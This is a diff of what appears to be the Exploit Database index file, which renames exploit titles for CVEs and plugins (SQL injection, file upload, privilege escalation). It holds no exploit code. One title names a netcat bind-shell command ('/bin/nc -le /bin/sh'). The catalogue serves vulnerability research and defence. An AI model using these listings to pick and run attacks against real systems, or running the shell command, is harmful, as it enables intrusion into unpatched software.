36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36520,platforms/php/webapps/36520.txt,"Berta CMS - File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 +36520,platforms/php/webapps/36520.txt,"Berta CMS - Arbitrary File Upload",2015-03-27,"Simon Waters",php,webapps,80 36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 @@ -32977,7 +32983,7 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 -36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 +36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 @@ -32996,7 +33002,7 @@ id,file,description,date,author,platform,type,port 36575,platforms/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 -36739,platforms/osx/local/36739.m,"Apple Mac OS X < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 +36739,platforms/osx/local/36739.m,"Apple Mac OSX < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 @@ -33034,8 +33040,8 @@ id,file,description,date,author,platform,type,port 36614,platforms/php/webapps/36614.txt,"WordPress Simple Ads Manager 2.5.94 Plugin - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 36615,platforms/php/webapps/36615.txt,"WordPress Simple Ads Manager Plugin - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 -36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 Plugin - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 -36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 Plugin - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0 @@ -33068,7 +33074,7 @@ id,file,description,date,author,platform,type,port 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - Interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667 -36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 +36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload and Execution",2015-04-06,Metasploit,jsp,remote,8080 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 @@ -33107,7 +33113,7 @@ id,file,description,date,author,platform,type,port 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36692,platforms/osx/local/36692.py,"Apple Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 +36692,platforms/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 @@ -33152,12 +33158,12 @@ id,file,description,date,author,platform,type,port 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local,0 -36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 +36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Deletion",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 (x86) - (PoC)",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 -36745,platforms/osx/local/36745.rb,"Apple Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 +36745,platforms/osx/local/36745.rb,"Apple Mac OSX - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33168,9 +33174,9 @@ id,file,description,date,author,platform,type,port 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 +36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 -36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation Exploit (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 +36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - pfile/kommentar.php filecat Parameter Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 @@ -33192,7 +33198,7 @@ id,file,description,date,author,platform,type,port 36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0 36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php' class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password manipulation Cross-Site Request Forgery",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation Cross-Site Request Forgery",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 @@ -33200,32 +33206,32 @@ id,file,description,date,author,platform,type,port 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection",2012-02-16,tempe_mendoan,php,webapps,0 36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting",2012-02-17,sonyy,php,webapps,0 -36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 -36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Include",2015-04-21,Vulnerability-Lab,ios,webapps,0 -36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 +36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 +36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 +36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Inclusion Web",2015-04-21,Vulnerability-Lab,ios,webapps,0 36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,ios,webapps,0 36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0 36800,platforms/php/webapps/36800.txt,"WordPress NEX-Forms < 3.0 Plugin - SQL Injection",2015-04-21,"Claudio Viviani",php,webapps,0 36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",php,webapps,0 36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0 -36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 +36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow",2015-04-21,Metasploit,windows,remote,0 -36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 +36809,platforms/php/remote/36809.rb,"WordPress Reflex Gallery Plugin - Arbitrary File Upload",2015-04-21,Metasploit,php,remote,80 +36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Plugin - Arbitrary File Upload",2015-04-21,Metasploit,php,remote,80 +36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Plugin - Arbitrary File Upload",2015-04-21,Metasploit,php,remote,80 +36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Plugin - Arbitrary File Upload",2015-04-21,Metasploit,php,remote,80 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0 -36814,platforms/osx/dos/36814.c,"Apple Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 +36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI redirection",2012-02-18,sonyy,php,webapps,0 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 36852,platforms/php/webapps/36852.txt,"TestLink - Multiple SQL Injections",2012-02-20,"Juan M. Natal",php,webapps,0 -36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80 -36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow Exploit (2)",2015-04-22,"Tomislav Paskalev",windows,local,0 +36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",php,webapps,80 +36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH Egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 @@ -33308,13 +33314,13 @@ id,file,description,date,author,platform,type,port 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0 36913,platforms/php/webapps/36913.pl,"Joomla! - 'redirect.php' SQL Injection",2012-03-05,"Colin Wong",php,webapps,0 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 -36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web",2015-05-04,Vulnerability-Lab,ios,webapps,0 -36973,platforms/php/webapps/36973.txt,"Gnuboard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0 +36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0 36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - '.m3u' Buffer Overflow SEH Exploit",2015-05-06,evil_comrade,windows,local,0 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 -36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web",2015-05-06,Vulnerability-Lab,ios,webapps,0 +36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)",2015-05-04,beford,linux,dos,0 -36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 36965,platforms/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 @@ -33324,7 +33330,7 @@ id,file,description,date,author,platform,type,port 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 -36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Include",2015-05-06,Vulnerability-Lab,ios,webapps,0 +36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0 36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 @@ -33332,7 +33338,7 @@ id,file,description,date,author,platform,type,port 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 -36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 +36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 @@ -33357,7 +33363,7 @@ id,file,description,date,author,platform,type,port 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 -36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 +36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution",2015-05-08,Metasploit,php,remote,80 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 @@ -33371,9 +33377,9 @@ id,file,description,date,author,platform,type,port 36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 36979,platforms/php/webapps/36979.sh,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 -36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 -36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 -36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 +36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0 +36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0 +36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 @@ -33425,7 +33431,7 @@ id,file,description,date,author,platform,type,port 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Admin User Creation Cross-Site Request Forgery",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos,0 37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,hardware,remote,0 -37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php username Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php 'Username' Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37040,platforms/php/webapps/37040.txt,"osCMax 2.5 - admin/xsell.php search Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37041,platforms/php/webapps/37041.txt,"osCMax 2.5 - admin/stats_products_purchased.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 @@ -33434,7 +33440,7 @@ id,file,description,date,author,platform,type,port 37044,platforms/php/webapps/37044.txt,"osCMax 2.5 - admin/information_manager.php information_id Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37045,platforms/php/webapps/37045.txt,"osCMax 2.5 - admin/geo_zones.php zID Parameter Cross-Site 